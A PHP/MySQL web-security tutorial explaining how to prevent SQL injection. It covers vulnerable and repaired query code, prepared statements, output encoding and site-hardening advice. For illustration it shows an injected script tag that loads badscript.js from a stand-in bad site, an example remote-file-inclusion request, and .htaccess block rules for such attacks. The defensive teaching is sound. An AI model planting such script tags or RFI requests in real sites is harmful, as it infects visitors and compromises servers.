A task that people often want to do with server-side programming code is pull data from a database. How to do that can become a rather complicated topic because there are many languages, such as PHP and ASP.NET, that you can use for connecting to many types of databases, such as MySQL and Microsoft SQL Server.
This article is about the security issues of using PHP to query a MySQL database, but the principles of security best practices are the same when querying any database using any language.
The basic act of querying a database is safe. You do it with SQL code that looks like this:
SELECT * FROM `pets` WHERE `owner`='Gwen' AND `species`='cat'
If you always ran the query that way with the search terms hard-coded in the text, there would never be a security issue. However, when writing code for a website, you most often have an SQL code template like this:
SELECT * FROM `pets` WHERE `owner`='something' AND `species`='something'
and it is your site visitors who provide both "somethings" by typing them into text boxes. Your PHP code must combine their input with your SQL template code to create a customized SQL query that you can execute. 
There is a security issue because the most popular ways of creating that combination, used by many people for many years and published in code examples all over the web, are insecure. They allow a malicious visitor to type SQL code into the text box instead of a legitimate "something". By clever use of punctuation, the SQL code can corrupt the query template and trick it into doing something other than the simple search that you intended. It can pull secret data out of the database and display it on a web page, insert new malicious data into the database tables, or even delete the database. 
The specifics of how this can occur are described in greater detail and slightly more technical language in the SQL Injection article at Wikipedia. I will not try to improve on their examples.  
From this point forward, I'll assume that you are probably reading this article because your website has already been hit with an SQL Injection attack and you are trying to figure out how to repair your code to prevent it from happening again. 

Example code vulnerable to SQL Injection, and how to repair it

These are the two most popular ways of combining user input with an SQL template to create the final query. If your code looks like this, it is vulnerable to SQL Injection and needs repair: 
$query = 
 "SELECT * FROM `pets` WHERE `owner`='" . 
 $_POST['ownername'] . 
 "' AND species='" . 
 $_POST['species'] . "'";
$query = 
 sprintf("SELECT * FROM `pets` WHERE `owner`='%s' AND `species`='%s'", 
 $_POST['ownername'], 
 $_POST['species']);
The most serious problem with both is that they insert the user-submitted text directly into the query template. If the user-submitted text contains quote characters, it's easy to see that the combined text can end up with the wrong numbers of quote characters, or unmatched quotes. Those are the things that can corrupt the query and hijack it to do something malicious. The solution is to "escape" all the incoming quote characters, using the mysql_real_escape_string() function. This makes the user-submitted quotes look different from the quotes that were already in the template, so MySQL won't get them mixed up with each other. Here are the improved versions:   
$query = 
 "SELECT * FROM `pets` WHERE `owner`='" . 
 mysql_real_escape_string($_POST['ownername']) . 
 "' AND species='" . 
 mysql_real_escape_string($_POST['species']) . "'";
$query = 
 sprintf("SELECT * FROM `pets` WHERE `owner`='%s' AND `species`='%s'", 
 mysql_real_escape_string($_POST['ownername']), 
 mysql_real_escape_string($_POST['species']));
Even if all you do is revise your code to look like the improved versions, that is a big step toward improving its security.
In the longer example code below, I'll add an additional security measure. I'll pre-validate the incoming $_POST variables for legitimacy and not use them at all (not do the query) if they're invalid.

PHP+MySQL Query Example Code

1) Example entire PHP page for processing form input, using the (older) mysql extension methods:

If you are only repairing old code and don't want to switch to completely new database methods, this example shows ways to improve security. You can use it as a guide or template for changes your code might need. Links go to pages in the PHP online manual.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Language" content="en-us">
<title>Pets Database Search Page</title>
</head>

<body>

<?php

$ResultCount = 0;

// ACCUMULATES THE ROWS OF THE HTML OUTPUT TABLE. IT STARTS WITH THE TOP ROW COLUMN HEADINGS.
$ResultTableRows = 
 '<tr style="font-weight:bold;">
  <td>Id</td>
  <td>Name</td>
  <td>Owner</td>
  <td>Species</td>
  <td>Sx</td>
  <td>Birth</td>
  <td>Death</td>
 </tr>
 '; 

/*
The following variable validations have the side-effect of prohibiting the potentially dangerous 
quote (and other) chars, so this validation is a secondary defense against SQL Injection. 

The allowed characters in the preg_match() example are ones legal in regular expressions
because I wanted to use regex for testing queries on the pets database.
For normal use on a web page, the set of allowed characters would usually be much more restrictive.

My validation strategy: each variable starts as unset. That protects against register_globals=On.
It also allows using an isset() test on it, as a flag, later.
The variable only becomes set if the user-provided value for it was acceptable.

Using trim() to remove leading/trailing whitespace is optional, 
but useful for variables where accidental user-submitted whitespace 
could cause a search to fail when it really should have succeeded
except for irrelevant whitespace that caused two strings not to match exactly.
*/

unset($FindOwner);
if(isset($_POST['ownername']))
{
 $_POST['ownername'] = trim($_POST['ownername']);
 if(preg_match('/^[a-zA-Z0-9^$.*+\[\]{,}]{1,32}$/u', $_POST['ownername']))
  $FindOwner = $_POST['ownername'];
}

unset($FindSpecies);
if(isset($_POST['petspecies']))
{
 $_POST['petspecies'] = trim($_POST['petspecies']);
 if(preg_match('/^[a-zA-Z0-9^$.*+\[\]{,}]{1,24}$/u', $_POST['petspecies']))
  $FindSpecies = $_POST['petspecies'];
}

/*
For the numeric variable, this example shows an alternative validation strategy:
Give the variable an initial default value that can be used if the user input is unacceptable.
That can also be done with string variables, but makes no sense for the 2 variables above.

All incoming $_GET/POST variables, even numeric ones, initially arrive as strings.
*/

$RowsLimit = 100;
if(isset($_POST['rowslimit']))
{
 $_POST['rowslimit'] = trim($_POST['rowslimit']);
 if(preg_match('/^[0-9]{1,4}$/u', $_POST['rowslimit']))
 {
  settype($_POST['rowslimit'], 'int');
  if(($_POST['rowslimit'] > 0) && ($_POST['rowslimit'] <= 1000))
   $RowsLimit = (int)$_POST['rowslimit'];
 }
}

// IF WE HAVE LEGAL SEARCH CRITERIA FOR BOTH REQUIRED FIELDS, DO THE SEARCH.
if(isset($FindOwner) && isset($FindSpecies))
{
 require($_SERVER['DOCUMENT_ROOT'] . '/config.php');
 if(mysql_connect($server, $user, $password) && mysql_select_db($database)) 
 {
  $query = sprintf("SELECT * FROM `pets` WHERE `owner` REGEXP '%s' AND `species` REGEXP '%s' LIMIT %d", 
   mysql_real_escape_string($FindOwner), 
   mysql_real_escape_string($FindSpecies),
   (int)$RowsLimit);
  
  if($result = mysql_query($query))
  {
   while($row = mysql_fetch_array($result, MYSQL_ASSOC))
   {
    $ResultCount++;
    $ResultTableRows .=  
     "<tr>\n" .
     '<td>' . htmlentities($row['id'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['name'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['owner'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['species'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['sx'], ENT_QUOTES) . "</td>\n" .  
     '<td>' . htmlentities($row['birth'], ENT_QUOTES) . "</td>\n" . 
     '<td>' . htmlentities($row['death'], ENT_QUOTES) . "</td>\n" . 
     "</tr>\n";
   } 
   mysql_free_result($result);
  }
  mysql_close();
 }
}
?>

<form method="post" action="">
<p>Enter criteria to search for:</p>
<p>Owner name (or partial): 
<input id="ownername" name="ownername" size="50" value="<?php if(isset($FindOwner)) echo $FindOwner; ?>"></p>
<p>Species to search for  : 
<input id="petspecies" name="petspecies" size="50" value="<?php if(isset($FindSpecies)) echo $FindSpecies; ?>"></p>
<p><input type="submit" value="Submit"></p>
</form>

<?php
if(!empty($_POST))
{
 echo '<h2>', $ResultCount, ' results:</h2>
  <table cellpadding="4" cellspacing="0" border="1" align="left" width="100%">', 
  $ResultTableRows, 
  '</table>';
}
?>

</body>
</html>

2) Example to process form input, using the (new) mysqli extension methods:

These mysqli methods are even safer. This block of code replaces the equivalent block in the example page code above.
if(isset($FindOwner) && isset($FindSpecies))
{
 require($_SERVER['DOCUMENT_ROOT'] . '/config.php');
 if($mysqli = new mysqli($server, $user, $password, $database))
 {
  if($stmt = $mysqli->prepare('SELECT * FROM `pets` WHERE `owner` REGEXP ? AND `species` REGEXP ? LIMIT ?')) 
  {
   if($stmt->bind_param('ssi', $FindOwner, $FindSpecies, $RowsLimit))
   {
    if($stmt->execute())
    {
     if($stmt->bind_result($id, $name, $owner, $species, $sx, $birth, $death))
     {
      while($stmt->fetch())
      {
       $ResultCount++;
       $ResultTableRows .=  
        "<tr>\n" .
        '<td>' . htmlentities($id, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($name, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($owner, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($species, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($sx, ENT_QUOTES) . "</td>\n" .  
        '<td>' . htmlentities($birth, ENT_QUOTES) . "</td>\n" . 
        '<td>' . htmlentities($death, ENT_QUOTES) . "</td>\n" . 
        "</tr>\n";
      }
     }
    }
   } 
   $stmt->close();
  }
 }
 $mysqli->close();
}

Other features of the code examples

Validate and/or sanitize all user-submitted values

For every data item that you'll be receiving from your users, make a list of all its possible legitimate values. If such a list isn't possible (it often isn't), define as completely as possible the attributes that all its possible legitimate values would have. For example, if the input is supposed to be an integer, it must consist of only digits. If it is supposed to be a name, it should contain only alphabetic characters and no punctuation except perhaps a hyphen or apostrophe (unfortunately, allowing apostrophes opens a security hole). In all cases, you can apply a length test, too. Incoming values should not be excessively long. Make your rules as restrictive as possible so that only legitimate values can pass the test.
In whatever programming language you use, build a regular expression (or a substitute using another coding method) based on the rules you just created, for testing the incoming value. If the incoming value passes the test (i.e. it's legitimate and reasonable for what your script expects it to be), you can proceed to use the value in your database query. If it doesn't pass the test, don't do the query. Reject the form submission.
That is called data validation. It is a standard best practice for dealing with all data that comes from outside a script. The reasons, and various validation methods, including a more modern method (PHP filter) for validating numbers and other variable types, are described more thoroughly in my article on preventing Remote File Inclusion, another type of security vulnerability.
In addition to having minimal examples of input validation, just enough to show the principle, the example scripts above demonstrate that it can be easier to implement validation if you don't use the incoming $_POST values directly. Instead, there are internal variables for holding the values. An incoming $_POST value is transferred to its internal variable only if it passes the validation tests. This strategy makes it easy to give the internal variable a safe default value which (depending on the application) can be usable when the incoming value doesn't validate. 
Sometimes, if an incoming value doesn't validate, a programmer chooses to do some text processing on it, such as removing or transforming illegal characters, to make it pass the validation. That is called data sanitization, or cleaning, or scrubbing. In some applications, that can be a sensible and reasonable thing to do, but in many applications it's not. After you transform the user's input, the end result is likely not to be what the user intended, anyway, and if the input was malicious, there's no point trying to help them. Just reject the submission.
Data validation is critically important in all languages, when dealing with all database programs. Unfortunately, it's not enough to ensure security by itself. 

Use prepared statements (parameterized queries) with placeholders for bound variables

In Example 2) above, that is done by this line:
$mysqli->prepare('SELECT * FROM `pets` WHERE `owner` REGEXP ? AND `species` REGEXP ? LIMIT ?')
The question marks are placeholders for three pieces of not-yet-known data, which are the "parameters" in this parameterized query. "Parameterized" means the code and data parts of the query are kept distinct and separate.
The MySQL server, via PHP's mysqli extension, compiles this into a prepared statement (you could call it a pre-prepared query) even though the data parts are not yet known.
It then binds three variables as data into the locations of the placeholder question marks, but only after casting (converting) them to the specified data types. 'ssi' means string, string, integer:
$stmt->bind_param('ssi', $FindOwner, $FindSpecies, $RowsLimit)
The data items that replace the question marks will be treated as data even if they happen to look like (or are) SQL code. Because the database knew ahead of time which part of the query is the code, it cannot be confused by data trying to masquerade as code.
Contrast that with the old-school method of creating a query by string concatenation: the query didn't exist until after the code and data were combined into a text string, and the database had to try to parse that text string to work out what the query was. Obviously, mistakes could be made.
Example 1) above does not have these protections and cannot be revised to have them. It creates the query after code and data have been combined into a text string, so it has that inherent weakness. The protection of having code and data kept separate is provided by the newer mysqli database extension, which is why it is so much better.

Keep database connection data in a separate file

The examples read database connection data (username, password) from a config.php file, for two reasons:
  1. All scripts that need the connection data can read it from that one file. If it is ever necessary to revise the information (such as to change the database password), it only needs to be done in that one file.
     
  2. If a server misconfiguration causes the PHP interpreter to fail, a web page is served with its PHP code still in it. If the connection data is in the file, it gets printed on the web page, an obvious security hazard. By contrast, if the connection data is in a separate file and included with the PHP require() function, the PHP failure causes require() not to execute, and the connection data remains safe.
The config file can be named anything, but it should have a .php extension, not .txt, .inc, or anything else. That is because when a .php file is served (and PHP is functioning properly), the PHP code is executed on the server and only its output is sent; the code itself never leaves the server. Thus, even if someone manages to request your config.php file with their browser, they will see only a blank page. However, if your file is called something like config.txt, config.inc, or config.db, it does not have that PHP protection: the full text, passwords included, will be sent to the browser.
Since config.php has the PHP protection against disclosure, additional security measures are optional under normal circumstances, but they include: store config.php outside public_html, or in a password-protected directory, or protect it with an .htaccess rule. On a Linux server that uses suPHP, you can set its file permissions to 0640 or even 0600 to protect it from being read by another user on your shared server.
An example config.php file:
<?php
$server = 'localhost';
$user = 'YourMySQLUser';
$password = '5m#Cnx(6hjNG';
$database = 'testpets';
?>
Example .htaccess protection for it:
<Files config.php>
order allow,deny
deny from all
</Files>
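A script might then pull in the connection data and open its connection along these lines (just a sketch; the path is hypothetical, so use wherever you actually keep config.php):

<?php
// If config.php is stored above public_html, require it by its full path;
// if it sits alongside the script, a plain  require 'config.php';  works too.
require '/home/youruser/config.php';

$mysqli = new mysqli($server, $user, $password, $database);
if ($mysqli->connect_errno) {
    die('Could not connect: ' . $mysqli->connect_error);
}
?>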

Use the htmlentities() function on any text that will be output to a web page

As the example code retrieves text from the database, it passes it through the htmlentities() function before outputting it to the web page. This is a best practice when handling any text that might contain HTML tags that are not, however, meant to be interpreted as HTML code when a browser receives them. Instead, they are meant to be displayed on the page, as text.
Here is an example of what htmlentities() does. An HTML script tag looks like this:
<script>
If your PHP code pulls that text out of your database and places it on the web page as-is, a browser that receives the web page will not display the text on the page. Instead, it treats it as the beginning of some JavaScript it is supposed to run.
However, if your PHP code uses htmlentities("<script>") to put the text on the web page, the result is this: 
&lt;script&gt;
When a browser receives that in a web page, it knows that it's not a <script> tag. Instead, it knows that it's supposed to put the text "<script>" on the page.
That might not seem like a very big deal, especially if your database data never contains HTML tags, anyway, but there is a situation where it can be quite important: what if, in spite of your best efforts, you do become the victim of an SQL Injection attack, and somebody manages to inject malicious script code into your database tables, where there previously weren't any HTML tags to worry about? 
If your PHP code was putting the text on the page as-is, it will now output the malicious script, as-is, like this:
<script type="text/javascript" src="http://badsite.com/badscript.js"></script>
Suddenly, your page is infected with a malicious JavaScript, and visitors to your site will start getting warnings from their antivirus programs.  
However, if your PHP code was passing the output through htmlentities(), it will output the malicious script to your web page like this:
&lt;script type=&quot;text/javascript&quot; src=&quot;http://badsite.com/badscript.js&quot;&gt;&lt;/script&gt;
Visitors to your site will see that text on the page, but their browsers will not interpret it as JavaScript code as the hackers intended, and they won't get warnings from their antivirus programs. 
htmlentities() rendered the output harmless EVEN AFTER an attack put malware in the database!
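In code, the idea is simply to encode at the point of output. A minimal sketch (the column name is hypothetical):

// $row comes from a database fetch, as in the examples above.
$comment = $row['comment'];   // hypothetical column that might contain injected HTML
echo '<p>', htmlentities($comment, ENT_QUOTES, 'UTF-8'), '</p>';

// If $comment contains   <script src="http://badsite.com/badscript.js"></script>
// the browser receives   &lt;script src=&quot;http://badsite.com/badscript.js&quot;&gt;&lt;/script&gt;
// and shows it as plain text instead of executing it.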

More defenses against SQL Injection and database corruption

Limited user privileges

Whenever you connect to a database, you must do it as a "database user". The "user" is one of the pieces of information in your connection data. You don't have to, and should not, connect to all your databases as the same user. Instead, create a different user for each database. You should not connect to any of your databases as your cPanel user. You can create as many MySQL users as you want.
Whenever you need to do a database task in a PHP script, you should do it as a user who is only authorized to access that one database, and who has the least possible privileges required to accomplish the task. For example, if your script only searches a database and outputs results on the page, the user for doing that should have read-only privileges for the database.
The reason is that if an SQL Injection attack succeeds in corrupting a query, it can only do as much damage as the hijacked user is authorized to do. If it tries to insert new data into a table, but the user doesn't have INSERT privileges, it will fail.
How to manage MySQL users in cPanel.

Ban SQL Injection attacks in .htaccess

You can use Apache .htaccess to ban (reject, without processing) incoming requests where the HTTP query string contains SQL code or punctuation symbols that are often used in SQL code. This can help protect you from undiscovered SQL Injection vulnerabilities in applications you use but whose code you have no control over because you didn't write it.

Preventing SQL Injection in other languages and other database programs

As mentioned earlier, the principles of security discussed in this article are applicable when connecting to any database program from any scripting language, but the specifics of creating and using the connection vary widely. I've tried to mention throughout the article key words and concept phrases that would be useful in web searches to find similar articles about other languages and other database programs.
PHP has connection methods for many databases, including Microsoft SQL Server.
Some of the most severe and widespread injection attacks have been against ASP/ASP.NET, especially in combination with MSSQL and IIS. I don't have experience in ASP, ASP.NET, or MSSQL/T-SQL to draw on for creating example code, so instead I'm trying to assemble a list of links that appear to be most useful.
Microsoft offers a free downloadable program for scanning and finding SQL Injection vulnerabilities in Classic ASP VBScript source code, with instructions and links to Microsoft articles. They also describe best practices and example code for ASP.NET (plus another page about the same), and how to use the .NET Regex class for data validation in ASP.NET. 
This is the simplest and thus most understandable example of creating a parameterized query in ASP.NET that I've seen.
This demonstrates creating a parameterized query for a login page with VBScript and dynamic SQL in Classic ASP using ADODB.Connection. This, also Classic ASP, is more complex, but adds typecasting to force variables to their desired types. This does a similar thing with slightly different code.
Code snippets for parameterized queries in several different languages/environments, including Cold Fusion, Delphi, Java.

Notes

  1. My somewhat strange example code is based on the "pets" database in the MySQL Tutorial.
     
  2. You can discover whether your website is receiving SQL Injection attacks at my hack attempt identifier.

What to do NOW to protect your website

Website security precautions

Sections 1-6 are absolutely necessary. They do not require a lot of technical knowledge.

1) Maintain strong security on the computer that you use to manage your website

Someone who successfully infects your PC can use it to get into your website. That is very common.
  • On any Windows PC (does not apply to Linux, Mac) that you use to administer your website, install good quality antivirus software to keep it free of viruses and Trojan downloaders that can install spyware such as keyloggers and password-stealers. Get real-time ("on access") protection that detects malware immediately when it is received. "On-demand" scanning (such as once a day or once a week) is not good enough. Malware can do all its damage, steal your data, and even delete itself, before you get around to doing a manual file scan.
     
  • On a Windows system, once a month, while logged into your PC as an Administrator, visit Windows Update to install the latest security patches for Microsoft products, including Internet Explorer.
     
  • Keep all your internet-related software such as browsers, plug-ins, and add-ons up to date with the latest security patches. Examples are Adobe Reader, Flash, and Java. You can check whether your Firefox plugins are up to date at Mozilla Plugin Check.
     
  • Use adequate security settings in your web browser. When Internet Explorer and Firefox are first installed, their default security settings are not high enough, and most people don't change them. Set JavaScript so it is Off by default and only enabled for trusted websites that require it. Follow best practices for IE, and use the NoScript add-on in Firefox. 
     
  • On a wireless network or in a public "hot spot", your data is transmitted by radio, and it is easy for someone nearby to monitor everything you send and receive that is not encrypted. Normal web browsing on http:// websites is not encrypted, and neither is a normal FTP login. Whenever you are "working wireless", use encrypted https:// to log in to your server, and use secure FTP (SFTP) to transfer files.

2) Follow accepted best practices for your website passwords

  • Use strong passwords: 8 to 20 random upper/lower/numeric/punctuation characters.
  • Use a different password in every location.
  • Only give your password to people who must have it.
  • If you give your password to someone temporarily, change it as soon as their work is finished.
Here is an entire article about why good passwords are so important. It has a strong password generator and password input boxes where you can practice typing strong passwords accurately to get used to them.
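If you'd rather generate passwords yourself, a rough PHP sketch like the following produces a random 16-character password. It assumes the OpenSSL extension is available; the character set is arbitrary, and the simple modulo step introduces a slight bias that doesn't matter for this purpose.

function make_password($length = 16) {
    $chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghjkmnpqrstuvwxyz23456789!@#$%^&*-_=+';
    $bytes = openssl_random_pseudo_bytes($length);   // cryptographically strong randomness
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= $chars[ord($bytes[$i]) % strlen($chars)];
    }
    return $password;
}
echo make_password();   // e.g. j7#Tq2p!Vw9m-KfZ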

3) Choose third party scripts carefully

Don't load your website with every cool script, gadget, feature, function, and code snippet you can find on the web. Any one of them could let a hacker into your site. Before you use something new, read its vulnerability report at Secunia.com, and do a web search on it to see if people talk about it as a security hazard. Some add-ons and templates are actually designed to be malicious. Ways to avoid those are described by the Google Blogger Team in Keeping Your Blog Secure.

4) Keep third party scripts up to date

Once you have installed a script such as WordPress, SMF, Coppermine, phpBB, or any others, find a way to make sure you are notified quickly when security updates are released. Get on a mailing list, subscribe to an RSS feed, subscribe to a forum board, create a Google Alert, whatever you need to do. When a security update is released, install it within 1 day, if possible. 

5) Use good security practices for SSH

SSH, Secure SHell, gives you command line access to your server, allowing you to execute operating system commands from a remote location. Most webhosts don't allow their shared hosting customers to use SSH at all, but a few do. Resellers and those who manage dedicated servers do have SSH.
  • If you have SSH access and you use it, its password should be exceptionally strong, 16 random characters or more. I've seen servers where the log of failed login attempts was 160MB or more, and the hackers eventually succeeded because the password wasn't strong enough.
     
  • If you have SSH access and you don't use it, disable SSH so nobody can use it. There is sometimes an SSH control switch in cPanel. For reseller accounts and dedicated servers, there is a switch in WHM. If you are a reseller or run a dedicated server on which there are multiple accounts, turn SSH off for all accounts or at least those that don't use it. If you allow SSH at all, let your users ask you to enable it for them. Most never will.

6) Don't weaken your server's file and folder permissions

Each file and folder on your server has permissions settings that determine who can read or write that file, execute that program, or enter that folder. Your webhost initially created your webspace with secure permission settings on all files and folders.
Do not modify the permissions until you know what you're doing. Don't guess. One mistake can allow any other account on your shared server to put files on your site, or allow anyone in the world to put files there by first getting into a weaker website on your shared server and running a malicious PHP script from there.
People having trouble installing web applications on their site are sometimes told to try setting the Linux permissions to 777 (for folders) or 666 (for files). Those permission levels are sometimes necessary, but they are a hazard and should only be used for folders and files for which it's absolutely necessary, and only during times when it's absolutely necessary. For example, sometimes 777 only needs to be used during installation or during configuration changes or software upgrades. At other times, the application might function just fine even if you change the permissions back to more secure settings. In other words, if you need to use insecure permissions, try to minimize the amount of time they are in effect. There is no reason to leave permission levels low all the time if you only need them to be that way occasionally.

Also, if software installation instructions tell you to delete the installation script itself after use, remember to do it. If it's left on the server, someone else who knows it's there (or knows it should be there) can run it, just like you can.
A separate article has a short explanation of permissions settings.
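If it helps, the tightening-up step can even be scripted. A rough PHP sketch (the paths and the target permission values are hypothetical; check what your application actually needs):

// Restore secure permissions once installation is finished.
chmod('/home/youruser/public_html/myapp/uploads', 0755);              // was 0777 during install
chmod('/home/youruser/public_html/myapp/config/settings.php', 0644);  // was 0666 during install

// And remove the installer so nobody else can run it later.
$installer = '/home/youruser/public_html/myapp/install.php';
if (file_exists($installer)) {
    unlink($installer);
}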

7) Write your own scripts securely

These precautions are also absolutely necessary, but only if you write your own program code.
  • For the language you use, find and read an overview about security: PHP, ASP.NET, Cold Fusion, ...
  • When you use an unfamiliar function for the first time, check the manual for security considerations.
  • Learn to instinctively distrust data from the outside world. Write your code so that incoming malicious input can't trick it into doing something it shouldn't. Outside data includes: incoming form submission data, HTTP query strings, cookies.
  • Learn how to prevent "Remote File Inclusion". (#1 most common security error)
  • Learn how to prevent "SQL Injection". (#2 most common security error)
  • There are lots of online resources for learning how to code securely. All it takes is a web search.
  • For PHP, use a good php.ini file for extra security, to block common attacks.
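As promised above, here is a minimal sketch of the whitelist approach to avoiding Remote File Inclusion (the page names and file paths are hypothetical): instead of including whatever path the request supplies, the script maps the request value onto a fixed list of its own files.

$pages = array(
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if (!isset($pages[$page])) {
    $page = 'home';            // anything unexpected falls back to a safe default
}
include $pages[$page];         // only files from the whitelist can ever be included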

8) Block suspicious activity with .htaccess

These are extra precautions that provide an additional layer of security. If you understand what this section is talking about, the discussion and code examples should help you to put some good protections in place. If you don't understand this section, don't worry about it unless you are under constant attack and other remedies have failed.
Download and examine your raw access logs, or analyze the lines here. You will most likely find attacks of the types described in my articles. Even if the attempts are unsuccessful, your logs give early warning about what methods are being used, which gives you time to figure out how to defend against them. Here are some examples of how to block suspicious activity:
  1. Ban bad robots.
    One program often misused for automated remote file inclusion attacks is called  "libwww-perl". The RFI cannot succeed if your server refuses to serve the file, so blocking this commonly malicious User-Agent is one defense. Put the following lines in your public_html/.htaccess, in a part of the file that is not delimited by HTML-style tags like <tag></tag>: 
SetEnvIfNoCase User-Agent libwww-perl block_bad_bots
# to deny more User-Agents, copy the line above and change
# only libwww-perl, to match the new name.
deny from env=block_bad_bots

SetEnvIfNoCase does a case-insensitive test of the User-Agent against a regular expression, which in this case is "contains libwww-perl". If it matches, it sets the variable block_bad_bots. The final line says if block_bad_bots was set (i.e. if the requestor matched any of the bad robots), deny the request and send a 403 Forbidden error instead. Regardless of what the bad robot was trying to do, it won't succeed.
  2. Ban suspicious URL query strings.
    Another defense against RFI is to block all requests having the form:
    GET /index.php?inc=http://badsite.com/badscript.txt?
    The following .htaccess code blocks any request where the query string (the part after the first question mark) contains "=http://" or "=ftp://". During times when you need to use a query string of that type yourself, you can comment out the code block or enable the exception shown:
# If the next line is already in your .htaccess, you don't need to add a 2nd one.
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*=(ht|f)tp\://.*$ [NC]
# Allow yourself, for SMF Forum Package Manager upgrades.
# Set it to your own IP address so you are the only one who won't be blocked.
#RewriteCond %{REMOTE_ADDR} !^111\.222\.333\.444$ [NC]
RewriteRule .* - [F,L]

To test: you should get a 403 Forbidden error when you try to go to:
http://yoursite.com?test=http://yoursite.com/anypage.htm
http://yoursite.com?test=ftp://yoursite.com/anypage.htm
If you have coded your pages so they use remote file includes from your own site or from some external site (such that your site receives requests, constructed by you, that have URLs in the query strings), my first advice is that you should try to stop doing that:
  • Instead of sending your own site a request that has a URL in the query string, you can put in the query string a text string that the receiving page translates into a URL after it receives it. That way, your script can't be tricked by someone who sends it a malicious URL instead of one of the legitimate ones it expects.
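For example, a sketch of that idea, assuming allow_url_fopen is enabled (the keywords and URLs are hypothetical): the query string carries only a short keyword, and the receiving script translates it into a URL it already trusts.

// The request is e.g.  /feed.php?feed=news  -- no URL ever appears in the query string.
$feeds = array(
    'news'    => 'http://www.example.com/news.xml',
    'weather' => 'http://www.example.com/weather.xml',
);
$key = isset($_GET['feed']) ? $_GET['feed'] : '';
if (isset($feeds[$key])) {
    $xml = file_get_contents($feeds[$key]);   // fetch only URLs from our own list
} else {
    $xml = '';                                // unknown keywords are simply ignored
}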
If you must send your own site requests that have URLs in the query strings, you can use a more complicated .htaccess to allow your own remote file inclusion requests but ban others:
# FIRST, DISALLOW QUERY STRINGS CONTAINING MORE INSTANCES OF http://
# THAN WE EVER USE OURSELVES, TO LIMIT THE NUMBER OF TESTS WE MUST DO LATER.
# THIS EXAMPLE ALLOWS ONLY ONE INSTANCE PER QUERY STRING.
RewriteCond %{QUERY_STRING} (.*http(\:|%3A)(/|%2F)(/|%2F).*){2,} [NC]
RewriteRule .* - [F,L]

# NOW WE CAN TEST EACH INSTANCE AGAINST THE LIST OF SITES WE WANT TO ALLOW.
# SINCE THIS IS A NEW REWRITE RULE, WE MUST TEST AGAIN WHETHER IT CONTAINS http://
RewriteCond %{QUERY_STRING} http(\:|%3A)(/|%2F)(/|%2F) [NC]

# THEN FALL THROUGH TO THE BAN IF IT IS NOT ONE OF THE SITES IN OUR ALLOW LIST.
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site1\.com) [NC]
RewriteCond %{QUERY_STRING} !(http(\:|%3A)(/|%2F)(/|%2F)(www\.)?site2\.com) [NC]
#ADD A LINE FOR EACH EXTERNAL SITE YOU WANT TO ALLOW TO APPEAR IN QUERY STRINGS.

RewriteRule .* - [F,L]

Allowing for more than one instance of http:// in your query strings is possible. It requires complex code that we can custom design for you if needed.
Other query string bans:
1) Malicious RFI attempts almost always have a question mark at the end of the query string. Ban any query string that contains a question mark. The first question mark (which marks the beginning of the query string) is not part of the query string, so only question marks after the first one will trigger the ban:
RewriteCond %{QUERY_STRING} (\?|%3F) [NC]
RewriteRule .* - [F,L]

2) Be creative: find other characteristics that are common in the attacks on your site but that are never present in legitimate requests. Be thorough: use every good ban rule you can think of. It is very satisfying to see an attack on your site and know that even though it only needed to trigger one ban rule to fail, there were six others in reserve that it would have triggered.
  3. Ban IP addresses responsible for suspicious activity.
    You can block IP addresses (or ranges) in .htaccess or by cPanel > Deny IP. Although such bans can be useful against IP addresses you are 100% certain will never make a legitimate request, they aren't otherwise very practical. Once a botnet starts attacking your site, the requests will come from hundreds of different IPs, and banning them all will be futile. It is much better to ban by the other characteristics of the requests.
     
See this forum thread for further discussion about using .htaccess to block malicious requests, links to websites with suggested .htaccess code for blocking such requests, and a basic introduction to help understand the Perl regular expressions that are used for pattern matching in .htaccess.

Preparations that will make hack diagnosis and cleanup easier

1) Always have a backup copy of your entire website and its databases

You can use FTP and/or cPanel > Backups. Keep the backup somewhere not on your server, such as on your local PC or a DVD. Even if your webhost does backups, make a separate set for yourself. Do a new backup whenever there is enough new content that you don't want to have to redo the work. Keep more than one "generation" of backups. For example, if you back up monthly, keep separate versions from 1 month ago and from 2 months ago. This guards against backing up your site after it's been infected but before you've discovered it. You'll still have (hopefully) a slightly older backup that isn't infected. For the same reason, don't back up too often.

2) Turn on log archiving in cPanel now

Your raw HTTP and FTP logs are an important source of information after an attack, but the logs are normally deleted each day. Enable archiving to allow them to accumulate and preserve the evidence after an attack. Periodically download and review the logs to see what kinds of attacks are being launched against your site. As is so often the case, becoming familiar with what is normal will help you detect when something is not. Accumulated logs can take a lot of disk space, so you might want to delete old ones from the server periodically.

3) Get a complete list of your site files NOW while they are known-good

This article describes how to get a list of all the files in your website. If you do it now, it will be a baseline list of the files you can assume are supposed to be there. If your site gets damaged, the list will help you decide whether a file you don't recognize is new or is just a system file that you never noticed before.

4) Explore your website and become familiar with what is there

Not just your pages, but the whole site, using FTP or File Manager or the complete file list you made. If you get used to what is normal, things that aren't will catch your attention.

5) Use good database connection practices in scripts:

a) Create separate MySQL users for your scripts to use

If you use your cPanel userID and password for database connections in your scripts, then changing your cPanel password will instantly break all your scripts until you recode them to use the new password.
Instead, create one or more new users, completely unrelated to your cPanel login, that your scripts can use for their database connections:
  1. Go to cPanel > MySQL® Databases > Current Users.
  2. In Username: enter the name of the user to create. Although the existing user names might appear as YourUserID_username, don't enter the prefix and underscore. cPanel will do that for you, if needed.
  3. In Password: enter the password to use. Make it a strong one.
  4. Click Create User, read the confirmation screen, and then Go Back to the MySQL Account Maintenance page.
